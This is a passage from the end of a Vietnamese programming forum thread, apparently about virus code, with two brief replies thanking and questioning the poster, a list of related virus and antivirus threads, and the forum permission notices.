    12 2006
    Nơi ở
    US
    Bài viết
    1,917

    Đọc mấy đoạn code này thấy phê phê T_T ! Thanks coder_gate !

  10. #10
    Ngày gia nhập
    09 2007
    Bài viết
    724

    - Khiếp thiệt mấy cu này không lo học chính đạo mà toàn mò mấy cái tà đạo học không à....
    - @coder_gate bạn kiếm đâu ra mấy con này mà hay vậy. mình thấy khoái chú thứ 4 từ trên xuống không biết có ai thử test nó chưa??? cho mình xem kết quả với.

Các đề tài tương tự

  1. Mã nguồn virus viết bằng C(củ chuối)
    Gửi bởi AlexF trong diễn đàn Lập trình Virus & Anti-Virus
    Trả lời: 2
    Bài viết cuối: 13-06-2013, 10:48 PM
  2. SimpleAV | Mã nguồn Anti Virus đơn giản viết trên VC++ 2005
    Gửi bởi dungcoi trong diễn đàn Lập trình Virus & Anti-Virus
    Trả lời: 9
    Bài viết cuối: 04-03-2013, 05:35 PM
  3. Cây nhị phân tìm kiếm trong C [Mã nguồn trên Turbo C/ Borland C++]
    Gửi bởi PoPoPoPo trong diễn đàn Thủ thuật, Tutorials CTDL & Giải thuật
    Trả lời: 4
    Bài viết cuối: 29-03-2012, 10:54 PM
  4. Viết virus khóa chuột - Lập trình virus trên C
    Gửi bởi AlexF trong diễn đàn Lập trình Virus & Anti-Virus
    Trả lời: 21
    Bài viết cuối: 03-07-2010, 09:57 AM
  5. Mã nguồn chương trình quyét virus viết trên VC++ 2008
    Gửi bởi khanhduy301 trong diễn đàn Lập trình Virus & Anti-Virus
    Trả lời: 17
    Bài viết cuối: 12-01-2010, 12:45 AM

Quyền hạn của bạn

  • Bạn không thể gửi đề tài mới
  • Bạn không thể gửi bài trả lời
  • Bạn không thể gửi các đính kèm
  • Bạn không thể chỉnh sửa bài viết của bạn